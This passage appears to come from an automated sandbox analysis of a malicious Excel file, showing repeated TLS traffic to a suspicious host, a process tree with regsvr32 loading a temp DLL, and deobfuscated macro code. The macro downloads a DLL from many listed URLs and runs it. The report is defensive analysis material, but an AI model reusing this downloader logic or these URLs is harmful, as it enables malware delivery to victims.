Jan 11, 2021 16:53:00.251307964 CET	77.220.64.37	443	192.168.2.22	49247	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:02.306617022 CET	77.220.64.37	443	192.168.2.22	49251	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:04.397885084 CET	77.220.64.37	443	192.168.2.22	49255	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:06.462219000 CET	77.220.64.37	443	192.168.2.22	49259	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:08.533596992 CET	77.220.64.37	443	192.168.2.22	49263	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:10.686743975 CET	77.220.64.37	443	192.168.2.22	49267	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:13.591594934 CET	77.220.64.37	443	192.168.2.22	49271	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:15.664871931 CET	77.220.64.37	443	192.168.2.22	49275	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:17.771724939 CET	77.220.64.37	443	192.168.2.22	49279	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:19.877722025 CET	77.220.64.37	443	192.168.2.22	49283	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:22.025923014 CET	77.220.64.37	443	192.168.2.22	49287	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:24.154860973 CET	77.220.64.37	443	192.168.2.22	49291	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:26.273279905 CET	77.220.64.37	443	192.168.2.22	49295	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:28.460499048 CET	77.220.64.37	443	192.168.2.22	49299	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:31.065752983 CET	77.220.64.37	443	192.168.2.22	49303	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:33.173336029 CET	77.220.64.37	443	192.168.2.22	49307	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:35.263087034 CET	77.220.64.37	443	192.168.2.22	49311	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:37.383410931 CET	77.220.64.37	443	192.168.2.22	49315	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:39.461967945 CET	77.220.64.37	443	192.168.2.22	49319	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:41.537756920 CET	77.220.64.37	443	192.168.2.22	49323	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:43.624650955 CET	77.220.64.37	443	192.168.2.22	49327	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:45.731394053 CET	77.220.64.37	443	192.168.2.22	49331	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:47.811930895 CET	77.220.64.37	443	192.168.2.22	49335	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:49.944209099 CET	77.220.64.37	443	192.168.2.22	49339	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:52.017842054 CET	77.220.64.37	443	192.168.2.22	49343	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:54.124471903 CET	77.220.64.37	443	192.168.2.22	49347	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:56.212049007 CET	77.220.64.37	443	192.168.2.22	49351	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:53:58.309087992 CET	77.220.64.37	443	192.168.2.22	49355	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:54:00.425838947 CET	77.220.64.37	443	192.168.2.22	49359	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:54:02.562263966 CET	77.220.64.37	443	192.168.2.22	49363	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:54:04.685772896 CET	77.220.64.37	443	192.168.2.22	49367	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:54:06.915021896 CET	77.220.64.37	443	192.168.2.22	49371	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:54:09.038177967 CET	77.220.64.37	443	192.168.2.22	49375	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:54:11.129117012 CET	77.220.64.37	443	192.168.2.22	49379	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:54:13.204226017 CET	77.220.64.37	443	192.168.2.22	49383	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:54:15.298644066 CET	77.220.64.37	443	192.168.2.22	49387	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:54:17.447757959 CET	77.220.64.37	443	192.168.2.22	49391	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:54:19.528350115 CET	77.220.64.37	443	192.168.2.22	49395	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:54:21.581721067 CET	77.220.64.37	443	192.168.2.22	49399	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87
Jan 11, 2021 16:54:23.702207088 CET	77.220.64.37	443	192.168.2.22	49403	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	CN=Ixwe6ststa.run, O=Nelalia Co., L=Kigali, C=RW	Sun Nov 22 23:47:21 CET 2020	Mon May 24 00:47:21 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0	eb88d0b3e1961a0562f006e5ce2a0b87

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2432 Parent PID: 584

General

Start time:	16:51:39
Start date:	11/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fc30000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 1552 Parent PID: 2432

General

Start time:	16:51:44
Start date:	11/01/2021
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\deibsjhv.dll.
Imagebase:	0xff510000
File size:	19456 bytes
MD5 hash:	59BCE9F07985F8A4204F4D6554CFF708
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 1108 Parent PID: 1552

General

Start time:	16:51:45
Start date:	11/01/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	-s C:\Users\user\AppData\Local\Temp\deibsjhv.dll.
Imagebase:	0x110000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: DW20.EXE PID: 2460 Parent PID: 2432

General

Start time:	16:52:03
Start date:	11/01/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE
Wow64 process (32bit):	false
Commandline:	'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1804
Imagebase:	0x13fef0000
File size:	995024 bytes
MD5 hash:	45A078B2967E0797360A2D4434C41DB4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: DWWIN.EXE PID: 2452 Parent PID: 2460

General

Start time:	16:52:03
Start date:	11/01/2021
Path:	C:\Windows\System32\DWWIN.EXE
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\dwwin.exe -x -s 1804
Imagebase:	0xffa80000
File size:	152576 bytes
MD5 hash:	25247E3C4E7A7A73BAEEA6C0008952B1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Module1

Declaration

Line	Content
1	Attribute VB_Name = "Module1"

Executed Functions

Function pagesREviewsd, APIs: 16, Strings: 7, Number of lines: 22, Relevance: 56.022

APIs	Meta Information
Cells
SpecialCells
xlCellTypeConstants
value
Chr
Row
Split
Split
Cells
Replace	Replace("SET.NAME("b0b",CHAR(101))","?","http://truxiellogroup.com/d0l359.rar") -> SET.NAME("b0b",CHAR(101)) Replace("SET.NAME("v0","n")","?","http://148.72.88.102/iszvgm.zip") -> SET.NAME("v0","n") Replace("SET.NAME("i0","J")","?","http://helloprintcv.com.br/fdkhiec.rar") -> SET.NAME("i0","J") Replace("CANCEL.KEY(TRUE)","?","https://dev.decentwebsites.com/n18bqnz9.zip") -> CANCEL.KEY(TRUE) Replace("SET.NAME("w00","\")","?","http://bahia.consultoriass.es/xka8p2.rar") -> SET.NAME("w00","\") Replace("IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(FALSE))","?","http://pm.kezto.co.uk/mcluc5u.rar") -> IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(FALSE)) Replace("SET.NAME("bb",LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local"&w00&"T"&b0b&"mp"&w00)","?","http://impulsetest.co.uk/nbk13g.rar") -> SET.NAME("bb",LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local"&w00&"T"&b0b&"mp"&w00) Replace("SET.NAME("o0","32")","?","http://impulsetest.co.uk/nbk13g.rar") -> SET.NAME("o0","32") Replace("CANCEL.KEY(TRUE)","?","http://bahia.consultoriass.es/xka8p2.rar") -> CANCEL.KEY(TRUE) Replace("SET.NAME("oo0","?")","?","http://inmindppe.com/eb3kd1le.zip") -> SET.NAME("oo0","http://inmindppe.com/eb3kd1le.zip") Replace("SET.NAME("ab",LEFT(CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97),RAND()8+5)&".dll")","?","http://pm.kezto.co.uk/mcluc5u.rar") -> SET.NAME("ab",LEFT(CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97)&CHAR(RAND()26+97),RAND()8+5)&".dll") Replace("SET.NAME("w00",b0b)","?","https://9ehosting.com/vf6wahje.zip") -> SET.NAME("w00",b0b) Replace("SET.NAME("ba",".")","?","https://dev.decentwebsites.com/n18bqnz9.zip") -> SET.NAME("ba",".") Replace("CANCEL.KEY(TRUE)","?","https://www.gfischool.org/u4xbtzk.rar") -> CANCEL.KEY(TRUE) Replace("SET.NAME("ohgdfww","Dow"&v0&"loadToFil"&w00)","?","http://cooltcat.com/hiytvys.rar") -> SET.NAME("ohgdfww","Dow"&v0&"loadToFil"&w00) Replace("SET.NAME("v0","O")","?","http://www.sustaino2.com/q0ig4v.rar") -> SET.NAME("v0","O") Replace("SET.NAME("wegb","URLM"&v0&"N")","?","https://elcookcore.com/s2jetj.zip") -> SET.NAME("wegb","URLM"&v0&"N") Replace("CALL(wegb,"URL"&ohgdfww&"A",i0&i0&"CC"&i0&i0,0,oo0,bb&ab&ba,0,0)","?","http://sihtc.gtranzit.com/sgrc47di.rar") -> CALL(wegb,"URL"&ohgdfww&"A",i0&i0&"CC"&i0&i0,0,oo0,bb&ab&ba,0,0) Replace("SET.NAME("ohgdfww","h"&w00&"llEx"&w00&"cut"&w00)","?","http://helloprintcv.com.br/fdkhiec.rar") -> SET.NAME("ohgdfww","h"&w00&"llEx"&w00&"cut"&w00) Replace("SET.NAME("wegb","Sh"&w00&"ll")","?","http://immunoboosters.com/y0s4rt.zip") -> SET.NAME("wegb","Sh"&w00&"ll") Replace("CALL(wegb&o0,"S"&ohgdfww&"A",i0&i0&"CCCC"&i0,0,v0&"p"&w00&"n","r"&w00&"gsvr"&o0," -s "&bb&ab&ba,0,0)","?","http://cooltcat.com/hiytvys.rar") -> CALL(wegb&o0,"S"&ohgdfww&"A",i0&i0&"CCCC"&i0,0,v0&"p"&w00&"n","r"&w00&"gsvr"&o0," -s "&bb&ab&ba,0,0) Replace("SET.NAME("b0b",CHAR(101))","?","https://ypsilon.net.ar/ye6tmqi.zip") -> SET.NAME("b0b",CHAR(101)) Replace("SET.NAME("v0","n")","?","https://elcookcore.com/s2jetj.zip") -> SET.NAME("v0","n") Replace("SET.NAME("i0","J")","?","http://opinionglobal.com.do/ceepq536n.zip") -> SET.NAME("i0","J") Replace("CANCEL.KEY(TRUE)","?","https://dom-chel74.ru/ymuyks.rar") -> CANCEL.KEY(TRUE) Replace("SET.NAME("w00","\")","?","http://vegainwest.pl/uom2b4zog.rar") -> SET.NAME("w00","\") Replace("IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(FALSE))","?","https://ypsilon.net.ar/ye6tmqi.zip") -> IF(ISNUMBER(SEARCH("do",GET.WORKSPACE(1))), ,CLOSE(FALSE)) Replace("SET.NAME("bb",LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local"&w00&"T"&b0b&"mp"&w00)","?","https://dsenterprize.co.za/x3wwm4.zip") -> SET.NAME("bb",LEFT(GET.WORKSPACE(23),(FIND("Roaming",GET.WORKSPACE(23),1)-1))&"Local"&w00&"T"&b0b&"mp"&w00) Replace("SET.NAME("o0","32")","?","http://wexfashion.com/k04qkvqu.zip") -> SET.NAME("o0","32") Replace("SET.NAME("oo0","?")","?","https://www.gfischool.org/u4xbtzk.rar") -> SET.NAME("oo0","https://www.gfischool.org/u4xbtzk.rar") 